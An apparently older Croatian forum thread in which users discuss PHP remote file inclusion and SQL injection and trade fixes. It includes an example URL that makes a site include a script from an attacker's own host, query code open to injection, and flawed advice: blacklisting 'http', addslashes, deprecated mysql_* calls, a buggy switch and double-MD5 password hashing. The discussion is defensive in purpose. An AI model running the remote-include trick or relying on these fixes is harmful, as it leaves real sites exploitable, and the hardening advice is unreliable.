Hakeri

[Gogy]

silence a ovo nekastranica.com/index.php?fajl=nesto

jel tu ima kakvih gresaka u takvom nacinu?

[silence]

double post

[silence]

Citat:

Pravi autor: Gogy

silence a ovo nekastranica.com/index.php?fajl=nesto

jel tu ima kakvih gresaka u takvom nacinu?

pa ovisi... pretpostavaljam da se koristi PHP funkcija include(); kojoj je paramtar dan preko GET varijable u URL...
e sad...
ako piše recimo

Kod:

include ($_GET['fajl']);

i ja promjenim URL u

HTML Kod:

nekastranica.com/index.php?fajl=http://www.moja_stranica.com/moja_zla_skripta.php

onda je rupa, jer će includirati i izvršiti moju skriptu...

međutim... već sa malo promjene se to može izbjeći...

Kod:

include ($_GET['fajl']."php");

e sad skripta na GET varijablu iz URLa dodaje ekstenziju ".php" i kad ja probam includirat onako.. ne radi... naravno ja mogu pokušat maknut ekstenziju sa mog URLa i opet radi...
ali to je već malo posla s moje strane...

razradiš svoju skriptu još malo, recimo da prije includiranja provjerava sadržaj GET varijable i ako GET varijabla u sebi ima "http" ili "www" da se ne includira, onda si dodao još malo sigurnosti...

naravno ni to nije kraj, ali ovo je onako na brzinu... ja se ne bavim tolko s time jer mi to nije napeto, ali imam frenda koji radi čuda i koji mi je objasnio neke stvari, pa sam dodao neke stvari u svoje skripte koje pišem... sve ovisi kolko truda ti se da uložiti u pisanje koda...

recimo

HTML Kod:

www.mojsajt.com/index.php?i=1

PHP kod:

switch ($_GET) {
 case 1:
 $ubaci = "direktorij/datoteka.php";
 break;
 case 2:
$ubaci = "direktorij/datoteka2.php";
break;
default:
        die ("ne igraj se sa URL-om!");
}
include $ubaci; 


recimo kod ovoga ako se stavi nekaj u URL skripta bi se trebala prestat izvršavat kompletno

sve ovisi kako posložiš web, ali i o tome kako je server podešen... ako je server admin loš i ostavio je rupe, onda ih ti moraš zatvarati i paziti puno više kaj pišeš nego ako postoji kvalitetan admin koji je server podesio kako spada...

[Gogy]

Koliko je ovo sigurno?

PHP kod:

$kategorija=$_GET['kategorija']; 
$tutorijal=$_GET['tutorijal']; 
if($kategorija==null) {
include "pocetna.php"; }
else{

include("konekcija.php");

$rezultat = mysql_fetch_object(mysql_query("SELECT * FROM tablica where kateg='".$kategorija."' and tutor='".$tutorijal."'"));
echo bbcode($rezultat->kod) ; 


[silence]

http://en.wikibooks.org/wiki/Program...:SQL_Injection

dobro pročitaj to, pa mi ti sam reci.

za one ljene, u osnovi postoji mogućnost SQL injection napada jer izvršavaš SQL naredbu sa GET varijablom koju nigdje ne provjeravaš.
da ti odma bude lakše, ja sam isto tako radio prije, ali nakon kaj mi je frend objasnio kako radi SQL injection i ostalo, malo sam pronjuškao po netu i počeo koristiti mysql_real_escape_string().

evo još malo.

Citat:

SQL injection is a hacking technique which attempts to pass SQL commands through a web application for execution by a backend database. This is one of the most common application layer attacks currently being used on the Internet. The technologies vulnerable to this attack are dynamic script languages like ASP, ASP.NET, PHP, JSP, CGI, and so on.

To be able to perform SQL Injection hacking, all an attacker needs is a web browser and some guess work to find important table and field names. This is why SQL Injection attacks are so popular.

http://www.acunetix.com/websitesecur...-injection.htm



evo jedan isto prilično dobar članak, koji nudi i neka rješenja...
http://shiflett.org/articles/security-corner-apr2004

[Gogy]

Negdje sam pročito da ovo sprječava SQL injection:

$pretraga=addslashes($_POST["pretraga"]);

jel to istina?

[Vodoinstalater]

Dobio sam i previse nego sta sam trazio!

[silence]

Citat:

Pravi autor: Gogy

Negdje sam pročito da ovo sprječava SQL injection:

$pretraga=addslashes($_POST["pretraga"]);

jel to istina?

i da i ne.
http://www.webmasterstop.com/63.html

zajeb je u tome što konfiguracija servera nije uvijek ista. ako su magic quotes ON, onda dobiješ višestruke backslahove.
vjerojatno je da će sprječiti SQL injection, ali imaš noćnu moru kaj se tiče korištenja skripte na različitim serverima ili čak ako server admin napravi upgrade i recimo magic quotes iz off budu on.

dakle, nije da si u krivu, ali zbog vlastitog duševnog mira je bolje koristiti mysql_real_escape_string () funkciju koja je napravljena upravo za to. ako pročitaš članak koji sam linkao vidjet ćeš da addslashes() imaju problem kad vadiš podatke iz baze, jer te backslasheve treba maknuti...

sve u svemu... prije pisanja skripte, uvijek je pametno malo se potruditi oko ovakvih stvari i proći po netu i vidjeti kaj ljudi kažu i kakva su njihova iskustva.

[Gogy]

A jebemu sad ću se zamislit prije nego što pustim stranicu u promet, a već sam sve sredio skoro...

[silence]

ma gle... ako si koristio addslashes() i ako ti sve radi kako spada, možeš pustit stranicu, ali samo istestiraj kako se ponaša kad unosiš podatke i kada ih vadi van...

sve ovisi di si to koristio i za kaj.

ovo je recimo kak ja rješavam pitanje SQL injectiona prilikom ulogiranja korisnika u admin dio stranice.

PHP kod:

$a =  $_POST['user'] ;
         $b =  $_POST['pass'] ;
         $user = md5 ( md5 ("123".$a."456" ));
         $pass = md5 ( md5 ("!#&".$b."%098" ));
         $upit = "SELECT * FROM `useri` WHERE user='$user' AND pass='$pass'";
         $odgovori = mysql_query ( $upit, $db );
         $podaci = mysql_fetch_assoc ( $odgovori ); 


čak i da neko ubaci bilo kakvu SQL naredbu u neku od POST varijabli, može se jebat jer nakon dvostrukog md5() teroriziranja varijable nema šanse da tamo bude bilo šta štetno.
može se naravno stavit i samo jedan md5(), ali ovo je čisto iživljavanje